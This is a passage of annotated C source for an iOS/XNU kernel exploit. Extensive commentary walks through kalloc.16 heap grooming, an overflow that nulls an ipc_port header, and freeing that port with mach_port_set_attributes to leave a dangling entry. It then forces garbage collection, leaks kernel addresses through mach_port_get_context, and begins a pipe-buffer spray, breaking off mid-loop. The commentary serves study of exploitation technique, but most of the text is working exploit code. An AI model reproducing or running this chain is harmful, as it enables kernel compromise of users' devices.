// If you start overflowing from the edge of the last middle_kallocs, then you are most likely going to overflow into a free block. See the freed blocks :
// | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 |
// The "-" are freed blocks. If (4) overflows, then a - will be destroyed, resulting in a panic. Therefore, we steer away to the clear by moving away -20 chunks.
mach_port_t kp = middle_kallocs[next_middle_kalloc-20-1];
next_middle_kalloc--;
// Frees a kalloc.16 chunk(for a brief moment).
discard_message(kp);
// Beautiful. Absolutely intriguing. Now let's look at the diagram again.
//
// | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 |
// kalloc.16 ipc_ports
//
// The number are the allocated chunks, and the "-"s are freed blocks. Remember that we steered away from the edge of allocated blocks(4 and 5, etc.) by -20.
// And see the logic above and below. It's moving backwards in freeing, and it's filling the freed object again immediately(see "replacer_f").
// The order of the alloc & free logic :
// Free (3) -> do_vfs_overflow allocs kalloc.16 into (3) and overflows -> do_vfs_overflow frees the (3) kalloc.16 chunk -> kalloc_16() below refills (3)
// Now imagine what happens on each iteration of the overflow. Does the overflow ever, in any single iteration, overflow into a free chunk?
// NOT EVEN ONCE.
// It either overflows into an existing kalloc.16 chunk, or... it overflows into the very first ipc_port in the page that holds the ipc_ports!
// It never overflows in the freelist in any occasion.
// This ensures that the overflow, no matter how many times it happens, will not be harmful, and at the same time guarantees that it will overflow into one of the ipc_ports,
// because it loops "kallocs_per_zcram" times, so one of them is *bound to* overflow into an ipc_port.
//
// And also this explains why Ian is so keen to have this loop not be pre-empted. The actually overflow happens in this loop, and it happens hundreds of times, so it's best
// to have this loop not be interrupted by random kallocs by other processes.
//
// before we proceed further, we need to talk about the vulnerability and what the overflow gives us. Let's dive into this function.
do_vfs_overflow();
// realloc
//
// This combined with the above makes a perfect "safe overflow" primitive.
// Actually, we can't call this completely safe though. Consider the case where the CPU pre-empts, and another process kalloc.16's a critical object right in the place of chunk(4) before
// "replacer_f" fills in. Then when the overflow happens on chunk (1), then the critical object will be clobbered and the system will most likely panic. I am not entirely
// sure how much the reliability is for this overflow loop cause I didn't run it on a real device yet, but nevertheless, it is an awesome technique. :)
mach_port_t replacer_f = kalloc_16();
// loop through the candidate overwrite target ports and see if they were hit
// we can detect this via mach_port_kobject; if we know the name we pass it is valid
// but we get KERN_INVALID_RIGHT then we cleared the io_active bit
// ↑ Like Ian says, this is a way to see check if NULL has been written to the beginning of an ipc_port object.
for (int j = first_candidate_port_index; j < last_candidate_port_index; j++){
// We don't know exactly which one of the middle_port was overwritten, so we could just iterate through all of them, but we don't want to do that.
// We want to go through this loop as fast as possible with minimum amount of iterations. Thankfully, we have already calculated the min/max range of the target ipc_port object above, so we only have
// to search through this range.
// In the README, Ian mentions that this loop and the above heap preparing logic is the most problematic. That's why the spinners exist to lower other process interference, but it's not completely avoidable.
// It's like a race between this process's heap feng-shui and all the rest of the processes. These kind of situations are sometimes avoidable with creative ideas, or by targetting
// a less busy kalloc zone(if the bug has tolerance to move to another zone). This bug's nature is that it can only be activated when the "attrBufferSize" is 16, hence, it's tied mandatorily
// to the kalloc.16 zone. So it's unlucky for this bug, but it has to cope with it and work on an extremely busy kalloc.16 zone.
// It looks like a very interesting(and at the same time, painstaking) task to enhance the reliability here, because I've experienced a few pretty exotic situations
// in the past and had to think of creative ways to overcome them(such as 2 threads racing where I don't have any control to interfere, and both of them race-heap-feng-shuing
// on the same heap where one of them is overflowing continuosly, and requiring the process to survive while succeeding in the overflow into the target object).
// One thing that I might have tried is the "zalloc() timing attack" presented 3 years ago from Luca Todesco. It could help narrow down the range of the last kalloc.16 chunk on the page,
// and also the range of target ipc_port(assuming the zalloc() timing attack still works). If it does work, then I think it could also be used to determine when exactly the
// CPU has handed over execution to another task.
// Or another way is to just carefully place "sched_yield()" in the right locations within this loop, because we know when exactly free-alloc-overflow-free-fill happens on
// these lines of code, so we could actually draw out all possible scenarios where a rogue kalloc.16 allocation will race in and leave a free block in one of the kalloc.16
// chunks. If we're lucky, just fiddling around with sched_yield() here and there would do the trick.
// Or maybe... let's say there's a "free chunk storage spot" called FCP. We will spray a bunch of kalloc.16 chunks way early in the beginning of the sploit, and call this FCP.
// We could determine by empirical testing on the minimum schedule slice that this exploit task will be given. We will place several "sched_yield()"s so every code block
// between those "sched_yield()"s will be executed within that minimum schedule slice. Now before executing each "sched_yield()", we would deliberately free a couple chunks(let's say 10)
// inside FCP so they will be added to the freelist. The reason why we're doing this is to take care of rougue kalloc.16 allocations created by other processes.
// When the other process allocates a rogue kalloc.16, it will pick up a free block within FCP. It could probably free it right away, or hold on to it for a little bit. When our
// exploit task picks the CPU back up, first thing it'll do is spray 10+5 kalloc.16 blocks. This will not interfere with our middle_kallocs, because there are no free holes
// within them(actually, there are holes for very brief moments. Maybe placing sched_yield() just before the creation of those free holes would work). So basically, it's
// a placeholder free chunk storage technique that could cope with rougue allocations.
// Or maybe... you could just let the spinners constantly spray kalloc.16 chunks only when the master loop is running. This will drasitically reduce the success rate of
// overflow into ipc_port, but at the same time it reduces rougue kalloc.16 chunks landing into the middle_kallocs. Usually when I approached a problem this way, there
// was a "sweet spot" where the success rate is high enough, and the fail rate is low enough. This kind of sweet spot technique is good for POCs, but you would have to
// tinker with it on every different device, and also it could change when the device is busy(listening to music), so it's not recommended...
// Another way to rely on luck is to just increase the number of spinner threads by ten fold. Maybe that would make all the rogue allocations go away out of pure serendipity!
// Assuming this problem is solved, there is another problem. What if ipc_port page is not right after kalloc.16...? It could happen. Allocations from other processes could
// have filled up the freelist and create a new page right after our middle_kalloc page. If we were to overflow into that page and the first chunk in that page contains a
// free chunk or a critical object(i.e. first QWORD is vtable), then the kernel will panic. This problem is luckily easily solvable, with a bit of work. First, we need to
// assume that any chunk of any size could create that rougue page. We could, for instance, use the above mentioned FCP technique. Create a loooooooooooooong freelist for every
// single kalloc.X that exists in the system(we could probably leave a single allocation in every page for the page to not be garbage collected), and then finally initiate
// the heap grooming. Now, any interfering kallocs that are not kalloc.16 or ipc_port will be placed inside that placeholder freelink, and not disturb during the
// heap grooming process. It doesn't really matter if the rougue pages get created *after* the interleaving page heap grooming, cause all that's important is the kalloc.16 and
// ipc_port page order. During the overflow loop, the other allocations don't interfere in any way. Only the rougue kalloc.16 allocations are deleterious during this loop.
// So yeah, you need to deal with these problems 1. rougue kalloc.16 alloc/free during this loop. 2. Other allocations that would mess up the page order.
// While solving these 2 problems, problem 3 might pop up. And problem 4 too...
// All of this requires a lot of empirical testing until you find a method that is reliable enough. To debug this, I would first get the kernel task port with this exploit,
// and then I would re-do this whole process right after this loop excluding the overflow part and replacing it with just a kalloc/free, then read kernel memory with
// the kernel task port and check if the allocation order is always the same. I would introduce fixes based on the above ideas or other new ideas if there is a messup,
// then I would re-check it, and this cycle will go on and on until the allocation order is always the same for like 50 iterations. I would do the same to solve the
// rogue kalloc.16 problem. Also, I would check if the zalloc timing attack still works because it would serve as a useful tool for various purposes.
// But still, the best way would be to totally avoid these problems altogether by using a completely different exploitation technique.(Find a kalloc.16 object where if
// the first 8 bytes are wiped out to NULL, then something useful happens...?)
// Okay enough pondering on this problem, let's move on...
mach_port_t candidate_port = middle_ports[j];
kern_return_t err;
natural_t typep = 0;
mach_vm_address_t addr = 0;
// How does this function check which ipc_port object has been overwritten? For this, we need to see the object's definition :
/*
struct ipc_port {
struct ipc_object ip_object;
struct ipc_mqueue ip_messages;
...
...
struct ipc_object {
ipc_object_bits_t io_bits;
ipc_object_refs_t io_references;
lck_spin_t io_lock_data;
};
typedef natural_t ipc_object_bits_t;
typedef natural_t ipc_object_refs_t;
typedef struct {
struct hslock hwlock;
uintptr_t type;
} lck_spin_t;
// natural_t is an unsigned int.
*/
// Now we know what is going to be overwritten.
// ipc_port->ip_object->io_bits
// ipc_port->ip_object->io_references
// We need to know what the implication is if both of these are modified to NULL. Let's follow this function into the kernel.
/*
kern_return_t
mach_port_kobject(
ipc_space_t space,
mach_port_name_t name,
natural_t *typep,
mach_vm_address_t *addrp)
{
ipc_entry_t entry;
ipc_port_t port;
kern_return_t kr;
mach_vm_address_t kaddr;
// Our ipc_space is doing fine today. Moving on
if (space == IS_NULL)
return KERN_INVALID_TASK;
kr = ipc_right_lookup_read(space, name, &entry); <- Here
if (kr != KERN_SUCCESS)
return kr;
...
...
...
#define ipc_right_lookup_read ipc_right_lookup_write
kern_return_t
ipc_right_lookup_write(
ipc_space_t space,
mach_port_name_t name,
ipc_entry_t *entryp)
{
ipc_entry_t entry;
assert(space != IS_NULL);
is_write_lock(space);
// Space is fine
if (!is_active(space)) {
is_write_unlock(space);
return KERN_INVALID_TASK;
}
if ((entry = ipc_entry_lookup(space, name)) == IE_NULL) { <- Here
is_write_unlock(space);
return KERN_INVALID_NAME;
}
*entryp = entry;
return KERN_SUCCESS;
}
ipc_entry_t
ipc_entry_lookup(
ipc_space_t space,
mach_port_name_t name)
{
mach_port_index_t index;
ipc_entry_t entry;
assert(is_active(space));
// Here, index will be a valid index that points into the ipc_port->is_table, which is an array of ipc_entry objects
index = MACH_PORT_INDEX(name);
// index is valid, it points within the table's boundaries
if (index < space->is_table_size) {
// Entry now points to an ipc_entry object within the is_table
entry = &space->is_table[index];
if (IE_BITS_GEN(entry->ie_bits) != MACH_PORT_GEN(name) ||
IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE)
entry = IE_NULL;
}
else {
entry = IE_NULL;
}
assert((entry == IE_NULL) || IE_BITS_TYPE(entry->ie_bits));
// It just returns the entry! Nothing fishy going on here
return entry;
}
*/
// This function returns the correct entry in the is_table, because all the code logic is based on the user provided (untouched) name, and the ipc_space->is_table
// which was never corrupted and hence nothing should impeded this function's logic. The valid return value would be pass through and get returned from "ipc_right_lookup_write" also.
// Now back to "mach_port_kobject" then :
/*
// resume from here
kr = ipc_right_lookup_read(space, name, &entry);
if (kr != KERN_SUCCESS)
return kr;
// Nothing wrong here. Passes
if ((entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE) == 0) {
is_read_unlock(space);
return KERN_INVALID_RIGHT;
}
// It got the actual "ipc_port" object address here. If this were the overflown object, then things start to get interesting.
__IGNORE_WCASTALIGN(port = (ipc_port_t) entry->ie_object);
assert(port != IP_NULL);
ip_lock(port);
is_read_unlock(space);
// ip_active?
if (!ip_active(port)) {
ip_unlock(port);
return KERN_INVALID_RIGHT;
}
...
...
...
#define ip_active(port) io_active(&(port)->ip_object)
#define io_active(io) (((io)->io_bits & IO_BITS_ACTIVE) != 0)
*/
// Aha! Since "ip_object->ip_object->io_bits" has been wiped to NULL, "ip_active(port)" will be false which means the mach trap will return "KERN_INVALID_RIGHT".
// This means we can figure out which port is the corrupted one by simply checking the return value with "KERN_INVALID_RIGHT".
err = mach_port_kobject(mach_task_self(),
candidate_port,
&typep,
&addr);
if (err != KERN_SUCCESS) {
printf("found the port! %x\n", candidate_port);
target_port = candidate_port;
break;
}
}
// Stop searching. We found the corrupted port.
if (target_port != MACH_PORT_NULL) {
break;
}
}
// We're done with the most crash-sensitive heap arrangements and overflowing. Now we can relax on the CPU and stop the spinners.
// This implies the following code won't be that sensitive to exterior allocations.
stop_spinners();
// lets stash the ports we want to keep:
// we know the dangling port is about 30 loops back from the end of the middle_ports
// lets keep hold of a region about 3 loop iterations ahead of this
#define CANARY_REGION 4
// He's trying to preserve the ports_per_zcram(3 page) worth of ports, and he's trying to use the ports that were allocated a little bit *after* the overflown port
// It becomes clear later that he's doing this because he's going to use these ports, and also other sprayed memory that is allocated waaayy after these ports.
// He doesn't want the corrupted port containing page to be in his way when he's doing other stuff later.
int ports_to_hold = ports_per_zcram; //ports_per_zcram * 3;//0x49*3;
mach_port_t hold_ports[ports_to_hold];
for (int i = 0; i < ports_to_hold; i++) {
// This will probably be like ((3+1)*3) pages away. But keep in mind that the stashed ports will most likely span 4(not 3) pages, due to freelist randomization.
int source_index = ((INITIAL_PATTERN_REPEATS - HOP_BACK + CANARY_REGION) * ports_per_zcram) + i; // 20 10
// Stash them to use later
hold_ports[i] = middle_ports[source_index];
// These are set to null so the next loop will skip these hold_ports and not destroy them.
middle_ports[source_index] = MACH_PORT_NULL;
}
// now dump all our ports
// we can keep the early ports, we'll continue to use them for kallocs and stuff
// Free all the ports
for (int i = 0; i < next_middle_port; i++) {
mach_port_t port = middle_ports[i];
// Skip the stashed ports from the previous loop
if (port == MACH_PORT_NULL) {
continue;
}
if (port == target_port) {
// Cause the target port to be freed but leave us a dangling entry in the port table
// note that the port isn't active so we need a code path which will take and drop a reference
// but won't do anything if the port isn't active (like trying to give us a DEAD_NAME)
int new_size = 100;
// ↑ Like Ian says, he's trying to create a dangling port, where the actual ipc_port object is freed, but the ipc_space->is_table->ipc_entry still holds the address of the ipc_port object.
// We need to scavenge in the kernel source code to see if such construct exists, and Ian has found one called "mach_port_set_attributes". Let's dig into the source code.
/*
kern_return_t
mach_port_set_attributes(
ipc_space_t space,
mach_port_name_t name,
int flavor,
mach_port_info_t info,
mach_msg_type_number_t count)
{
ipc_port_t port;
kern_return_t kr;
...
...
...
// It falls into this switch case
case MACH_PORT_DNREQUESTS_SIZE: {
// We've set this correctly in userspace.
if (count < MACH_PORT_DNREQUESTS_SIZE_COUNT)
return KERN_FAILURE;
// It is a valid name. We haven't fiddled with it in userspace.
if (!MACH_PORT_VALID(name))
return KERN_INVALID_RIGHT;
// What's going on in here?
kr = ipc_port_translate_receive(space, name, &port);
if (kr != KERN_SUCCESS)
return kr;
kr = ipc_port_request_grow(port, *(int *)info);
...
...
...
#define ipc_port_translate_receive(space, name, portp) \
ipc_object_translate((space), (name), \
MACH_PORT_RIGHT_RECEIVE, \
(ipc_object_t *) (portp))
kern_return_t
ipc_object_translate(
ipc_space_t space,
mach_port_name_t name,
mach_port_right_t right,
ipc_object_t *objectp)
{
ipc_entry_t entry;
ipc_object_t object;
kern_return_t kr;
// We've looked at this previously. It returns the ipc_entry corresponding to the port name within the is_table.
kr = ipc_right_lookup_read(space, name, &entry);
if (kr != KERN_SUCCESS)
return kr;
// MACH_PORT_RIGHT_RECEIVE is passed here. Nothing wrong. passes
if ((entry->ie_bits & MACH_PORT_TYPE(right)) == MACH_PORT_TYPE_NONE) {
is_read_unlock(space);
return KERN_INVALID_RIGHT;
}
// It gets the real address of the ipc_port object. 8 bytes are corrupted with null at the beginning as a reminder.
object = entry->ie_object;
assert(object != IO_NULL);
io_lock(object);
is_read_unlock(space);
// Returns the object
*objectp = object;
return KERN_SUCCESS;
}
// Okay now back to mach_port_set_attributes
...
...
kr = ipc_port_translate_receive(space, name, &port);
if (kr != KERN_SUCCESS)
return kr;
// Dive into here
kr = ipc_port_request_grow(port, *(int *)info);
...
...
// This is a pretty long function. I've snipped some parts for brevity.
kern_return_t
ipc_port_request_grow(
ipc_port_t port,
ipc_table_elems_t target_size)
{
ipc_table_size_t its;
ipc_port_request_t otable, ntable;
// Uh oh. Is the kernel going to panic? No. When building release builds, the MACH_ASSERT macro is unset.
//
// #else / * MACH_ASSERT * /
// #define assert(ex) ((void)0)
// #define assert_static(ex) do {} while (0)
//
// All asserts are therefore muted.
assert(ip_active(port));
...
...
...
// Code logic here is completely unaffected by our corrupted ipc_port->ipc_object->io_bits/io_reference
...
...
...
// Now look at this! This seems subtle but remember that "ipc_port->ipc_object->io_reference" is overwritten with NULL. Hence, after this, the reference count is 1.
ip_reference(port);
ip_unlock(port);
...
...
// Here's the most relevant part. Since "ipc_port->ipc_object->io_bits" is NULL, "ip_active(port)" is false and this will fall to the else case.
if (ip_active(port) && (port->ip_requests == otable) &&
((otable == IPR_NULL) || (otable->ipr_size+1 == its))) {
...
...
...
} else {
ip_unlock(port);
// This. It decreases the reference count. But remember the reference count is currently 1? So it'll drop down to 0 and the ipc_port object will be freed(by "io_free" if you dig into the function)!
ip_release(port);
it_requests_free(its, ntable);
}
// Huh...? "ip_active(port) == false" is a pretty notable error condition, but nevertheless, it returns KERN_SUCCESS.
return KERN_SUCCESS;
}
// And finally, "mach_port_set_attributes", returns KERN_SUCCESS.
*/
kern_return_t err = mach_port_set_attributes(mach_task_self(), target_port, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)&new_size, sizeof(int));
// As mentioned above, if everything worked as expected, then "KERN_SUCCESS" should be returned, and the corrupted ipc_port should be freed.
// Even if it's freed, there's still the address of the corrupted(but now freed) ipc_object stored in ipc_space->is_table.
// That dangling port can be looked up, and various functions can act on the (now freed) ipc_object that lies somewhere in the memory.
// Also one thing to note is that by freeing this last target port, the 3 pages containing this target port is now completely freed, and can be garbage collected.
if (err != KERN_SUCCESS) {
printf("mach_port_set_attributes failed %s\n", mach_error_string(err));
} else {
printf("freed the port\n");
}
} else {
// Destroy all other "middle_port" ipc_port objects that we used to set up the criss-cross kalloc.16 & ipc_port pages.
// ... except 3 page worth of middle ports called hold_ports.
mach_port_destroy(mach_task_self(), port);
}
}
// 150MB
#define N_COLLECTABLES 3
// I think it's doing it because the total ammount of freed memory needs to reach a certain threshold(150MB...?) to trigger to Garbage Collector.
mach_port_t collectable_ports[N_COLLECTABLES];
for (int i = 0; i < N_COLLECTABLES; i++) {
collectable_ports[i] = hold_kallocs(0x800, 0x3e, 400, MACH_PORT_NULL, NULL);
}
// Freeing the sprayed kallocs. Now more than 150MB of chunks are freed.
for (int i = 0; i < N_COLLECTABLES; i++) {
mach_port_destroy(mach_task_self(), collectable_ports[i]);
}
// choose a port from the middle of the holder range as our canary:
// If you think about it for a second, hold_ports[ports_to_hold] is exactly (3+1)*3 pages away from the corrupted target port(which is in the start of the page),
// and due to the "caving in" characteristic of the freelist, "hold_ports[ports_to_hold/2]" will most likely be somewhere in the middle of the page, not right next to boundaries(the start or end).
// Is there a reason why he chose a port that's not on the boundary? Let's keep reading the code to see why.
mach_port_t canary_port = hold_ports[ports_to_hold/2];
mach_port_insert_right(mach_task_self(), canary_port, canary_port, MACH_MSG_TYPE_MAKE_SEND);
// now try to cause the GC by allocating many copies of the replacer object:
// the goal is to get the canary port overlapping the ip_context field of the dangling port
// Wow. It's trying to abuse the fact that our target corrupted port is in the beginning in the page. It's trying to replace the entire page(0x200 * 8 = 0x1000)
// that the corrupted ipc_port resides in by garbage collecting it, and replacing it with a new page with our controlled/sprayed content. It's placing a specific
// value in the index KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT. Considering that the kernel still sees that address as an ipc_port object, that offset actually corresponds
// to the "ipc_port->ip_context" member. Also, we don't know what the 0x3000 ipc_port page was originally aligned to, so it's just spraying everything with
// 0x1000, and no matter what the alignment used to be, the replacer_object page will always land neatly right on top of the target corrupted ipc_port.
// We're storing the canary_port port name to a specific offset, and because we're going to send it to the kernel via OOL messages, it's going to be converted
// in kernel into the real address of the canary_port's ipc_port object.
mach_port_t replacer_object[0x200] = {0};
replacer_object[koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)/8] = canary_port;
// the replacer object allocation is a 0x1000 alloc
// using the same maths as above lets allocate 200 MB of them,
// slowly, hoping to cause GC:
//int n_gc_ports = 200;
// ↑ 250 seemed to work better for him than 200. This value might have to be tweaked(presumably increased) if this part doesn't work correctly.
int n_gc_ports = 250; // 200
mach_port_t gc_ports[n_gc_ports];
for (int i = 0; i < n_gc_ports; i++) {
// This is like 1MB worth of kalloc. 250 iterations would create 250MB worth of allocations.
// I didn't read the kalloc source, but I guess the GC initiates only in the event of new allocation, not freeing. So one of these is going to trigger the GC
// kernel thread. The GC is going to collect the pages that have "all free chunks", and not bother with pages that have at least 1 allocated chunk in them.
// The collected pages can later be assigned to new kalloc.x chunks, should the specific kalloc.x run out of free chunks an request for a new page. This way
// we can actually take place of the pages for special zones, such as the ipc_port zone that we're trying to replace.
// One thing that puzzles me is that, does the new size category of hold_kallocs not introduce new sizes of kmsg objects? We haven't prepared for those, so if
// they get allocated, then they might accidently take place of our target corrupted object, instead of the replacer_object. I don't know for sure.
gc_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, replacer_object);
printf("gc tick %d\n", i);
// The GC thread actually needs to run. Hopefully the forfeited execution will be handed over to the GC.
pthread_yield_np();
// As an extra measure, because some time is needed for the GC to traverse through the completely free pages and add them to the completely free page list(or tree?)
usleep(10000);
}
// Hopefully GC would have collected that free page containing out corrupted port, and replaced it was the replacer_object 0x1000 amount of data.
// It's highly likely because we deliberately created 150 MB of free pages, but shortly after, sprayed *250 MB* worth of pages again. Unless the system already had
// more than 100MB completely free pages to begin with, the target page was most likely replaced.
printf("did that trigger a gc and realloc?\n");
// if that worked we should now be able to find the address of the canary port:
uint64_t canary_port_kaddr = 0;
kern_return_t err;
// We need to keep in mind that our process's ipc_space->is_table[correupted_port's index]->ipc_entry still contains our corrupted ipc_port object's absolute address,
// despite the fact that our object has been purposefully freed by "mach_port_set_attributes". This is going to be abused throughout the entire exploit.
// Now it's calling "mach_port_get_context" on the dangling port. Wouldn't it make the kernel immediately panic? By the way, the ipc_port object(which is not replaced with "replacer_object")
// now has all members zeroed out, except for one single member : "ipc_port->ip_context". Let's see what's happening inside this function.
/*
kern_return_t
mach_port_get_context(
ipc_space_t space,
mach_port_name_t name,
mach_vm_address_t *context)
{
ipc_port_t port;
kern_return_t kr;
// passes
if (space == IS_NULL)
return KERN_INVALID_TASK;
// passes
if (!MACH_PORT_VALID(name))
return KERN_INVALID_RIGHT;
// We've already seen this gracefully pass. we can from now on ignore this function now assuming that our corrupted port's absolute address will be safely returned.
kr = ipc_port_translate_receive(space, name, &port);
if (kr != KERN_SUCCESS)
return kr;
// This is zero. It falls into the else case
if (port->ip_strict_guard)
*context = 0;
else
// Wow! The ipc_port->ip_context value is directly returned to userspace.
*context = port->ip_context;
ip_unlock(port);
// And there is no sanity check or anything that panics the kernel. How convenient!
return KERN_SUCCESS;
}
*/
// Now we understand what this is trying to do. It's trying to get the kernel address of the canary_port ipc_port object.
// This convenience function is going to be abused a couple more times in the future.
err = mach_port_get_context(mach_task_self(), target_port, &canary_port_kaddr);
if (err != KERN_SUCCESS) {
printf("error getting context from the target port (but no panic...): %s\n", mach_error_string(err));
}
printf("the canary port is at %016llx\n", canary_port_kaddr);
// lets modify the port so we can detect when we receive the message which has the OOL_PORTS descriptor which
// overlaps the dangling target port:
// we should be a bit more careful doing this to not go off the end:
// ↑ Like Ian says, it's modifying the fake_canary's ipc_port object address to point to the object right after it. 0xa8 is the exact size of a single ipc_port object.
// Aha! So this is why he tried to cherry pick a port that wasn't on a page boundary. It's trying to replace it with a port that is right behind it.
uint64_t fake_canary_kport_addr = canary_port_kaddr + 0xa8;
// It's overwriting a single port address(the canary ipc_port) in the OOL ports array with the next object's address. For what reason?
err = mach_port_set_context(mach_task_self(), target_port, fake_canary_kport_addr);
// lets build the contents of the pipe buffer
// we're gonna hope that we can get this allocated pretty near the canary port:
// This isn't really used
size_t pipe_buffer_size = 0xfff; // this is for kalloc.4096
// It's allocating space to hold data that's going to be passed into a pipe.
// Why and how would pipes create kalloc buffers? To understand that, you need to follow the kernel source code :
//
// pipe(proc_t p, __unused struct pipe_args *uap, int32_t *retval){
// ...
// ...
// ...
// rpipe->pipe_peer = wpipe; // From here, you can understand how the kernel pipe set up. The most important members are these.
// wpipe->pipe_peer = rpipe;
// ...
//
// And now the pipe writing part :
// - write(struct proc *p, struct write_args *uap, user_ssize_t *retval)
// - write_nocancel(struct proc *p, struct write_nocancel_args *uap, user_ssize_t *retval)
// - dofilewrite(vfs_context_t ctx, struct fileproc *fp, ...
// - if ((error = fo_write(fp, auio, flags, ctx))) { ...
// - pipe_write(struct fileproc *fp, struct uio *uio, __unused int flags, ...
// - pipe_size = choose_pipespace(wpipe->pipe_buffer.size, wpipe->pipe_buffer.cnt + orig_resid);
// ...
// ...
// - error = pipespace(wpipe, pipe_size);
//
// And in pipespace() you will find a sweet kalloc.
// if ((buffer = (vm_offset_t)kalloc(size)) == 0 )
//
// Actually, choose_pipespace() rounds it up to pipe manageable sizes, but we're allocating 0x1000 which fits nicely into a pipe manageable size category.
uint8_t* pipe_buf = malloc(0x1000);
memset(pipe_buf, 0, 0x1000);
// This "pipe_target_kaddr_offset" is the distance from the canary ipc_port(from the middle_ports array) to a target page where we are attempting to load
// user controlled data. This user controlled data will be loaded into kernel memory via the aforementioned pipe kalloc primitive.
// But why is it ofsetting 0x10000? Because remember this from way above?
// int HOP_BACK = kernel_page_size == 0x4000 ? 16 : 30;
// This means that the interleaving kalloc.16 and ipc_port pages will have been sprayed 0x1000 * 30 * (3+1) times, which is 0x78000. You see, it's just picking up an
// appropriate medium value within that range. But then another questions arises. Didn't the kalloc.16 chunks not become deallocated? Yes they are still in memory,
// so basically, the kernel memory has a whole bunch of kalloc.16 pages, with interleaving 1Page sized OOL port arrays sprayed during the GC initiating loop above.
// But if you think about it, the interleaving pages are always in the same order. A | B | A | B | A | B | A | B ... Let's say A is the pages containing ipc_port.
// A + 0x2000 will also point to a ipc_port page. And all A + 0x2000 * n will point to an ipc_port page. Hence, A + 0x10000 will also point to an ipc_port page.
// This is why the repeating order is also important. This offset assumes that the order is not skewed, or could be skewed but skewed in an even number of times.
uint64_t pipe_target_kaddr_offset = kernel_page_size == 0x4000 ? 0x20000 : 0x10000;
// Aligning it to the beginning of the page, so we can calculate the start of the target page
uint64_t pipe_target_kaddr = (canary_port_kaddr + pipe_target_kaddr_offset) & (~0xfffULL); // 0x10000
printf("pipe_target_kaddr: %016llx\n", pipe_target_kaddr);
// Building a fake arbitrary read task port, but this isn't really used so skip this piece of code
build_fake_task_port(pipe_buf, pipe_target_kaddr, pipe_target_kaddr, 0, 0, 0);
// now go through each of the hold_kalloc messages and receive them.
// check if they contained the canary port
// reallocate them
// This is just a refiller, that refills the 1MB worth of GC pages that seem irrelevant to the searching process.
mach_port_t secondary_leaker_ports[200] = {0};
struct {
mach_msg_header_t hdr;
mach_msg_body_t body;
// It respects the size of the 1MB spray OOL port descriptors that were used during GC.
// gc_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, replacer_object);
// We're trying to deallocate these by mach_msg receiving them, then refill those pages with pipe buffers.
mach_msg_ool_ports_descriptor_t ool_ports[0x1f];
mach_msg_trailer_t trailer;
char pad[1000];
} msg = {0};
printf("sizeof(msg) 0x%x\n", sizeof(msg));
// An indicator that the dangling port is found. This dangling port is different from the target dangling port. I'll call this new one the canary dangling port.
// The canary dangling port is the one that is stored in the GC OOL arrays, and the one we skewed with 0xa8 a couple lines above.
int hit_dangler = 0;
// This is the total ammount of pipe sprays. It only iterates 14 times, because the total kernel space for pipes is limited.
// I think the limit is loosely related to the 10240 RLIMIT_NOFILE hard limit that was set in the very beginning.
// That's why it's only iterating 14 dangler_hit times. After that, around 6000 file descriptors will have been created.
int dangler_hits = 0;
printf("the canary port is: %x\n", canary_port);
// This is going to eventually store the found skewed port that has been returned to userspace
mach_port_t fake_canary_port = MACH_PORT_NULL;
// n_gc_ports = 250
// We're going to iterate through every GC OOL arrays that we sprayed, and do something with it.
for (int i = 0; i < n_gc_ports; i++) {
mach_port_t gc_port = gc_ports[i];
// We actually sent 8 messages per spray, so go through them all
for (int j = 0; j < 8; j++) {
// It's receiving the message. This is going to deallocate the kernel memory allocated for these OOL arrays.
// And it's going to convert the ipc_port kernel addresses into userspace mach_port names, and return it to userland
err = mach_msg(&msg.hdr,
MACH_RCV_MSG,
0,
sizeof(msg),
gc_port,
0,
0);
if (err != KERN_SUCCESS) {
printf("failed to receive OOL_PORTS message (%d,%d) %s\n", i, j, mach_error_string(err));
}
// check each of the canary ports:
for (int k = 0; k < 0x1f; k++) {
mach_port_t* ool_ports = msg.ool_ports[k].address;
// We only set one single port in this 0x200 * 8 sized array(The one that is in the same offset of ipc_port->ip_context). Directly get the port name from that offset.
mach_port_t tester_port = ool_ports[koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)/8];
// Remember, we skewed one of the ipc_port kernel address by 0xa8. Hence, the new address is going to point to the next ipc_port object right after the canary ipc_port object.
// When the kernel converts the kernel ipc_object back to userspace names, it's going to consult to ipc_space->is_table and is going to access a different ipc_entry from the canary port's entry,
// And it's going to generate a userspace port_name based on that ipc_entry and store it to the OOL array that's returned to userspace.
// What this means is the returned port will not be the canary_port, but a different port. A random port within the 1 page worth of hold_ports array!
if (tester_port != canary_port) {
// Something to remember is that the GC ool_ports that overlapped the first target dangling port is now mach_msg received and hence freed. This target dangling port
// containing page will be overwritten again with pipe buffers, to create more type confusion and more useful primitives.
printf("found the mis-matching OOL discriptor (%x)\n", tester_port);
// We now know that we found the GC OOL descriptor that's responsible for holding the misaligned ipc_port. Mark it.
hit_dangler = 1;
// We store this for later, because the kernel has marked(increased reference) this skewed port instead of the canary port before it returned it to userspace.
// We're going to have to account for this and clean it up later so it won't cause any issues.
fake_canary_port = tester_port;
} else {
// drop the UREF
//
// Decrease reference count by 1. In the end, all the references from canary_port will be dropped except for 2, the hold_array, and the one that should have been decreased, but the misaligned port picked up instead.
mach_port_deallocate(mach_task_self(), tester_port);
}
}
}
if (!hit_dangler) {
// if we haven't yet hit the dangler, try to reallocate this memory:
//
// Assuming that the new pages are allocated in consecutive order, then all the pages in front of the canary_port are irrelevant, because the final goal of this
// for loop is to allocated a user controlled memory chunk that is 0x10000 bytes away from the canary_port.
secondary_leaker_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, NULL);
} else {
if (dangler_hits == 14) {
// we'll run out of pipe kva so stop now
printf("hopefully that's enough pipes\n");
break;
}
for (int i = 0; i < (0x1f*8); i++) {
// we have hit the dangler; from now on out we'll realloc with pipes
// pipe memory is limited
//
// ↑ Like he said, he's going to refill the memory with pipes, because pipes have full control on the user content as opposed to OOL port descriptors.
int fds[2] = {0};
// Create a pipe
int err = pipe(fds);
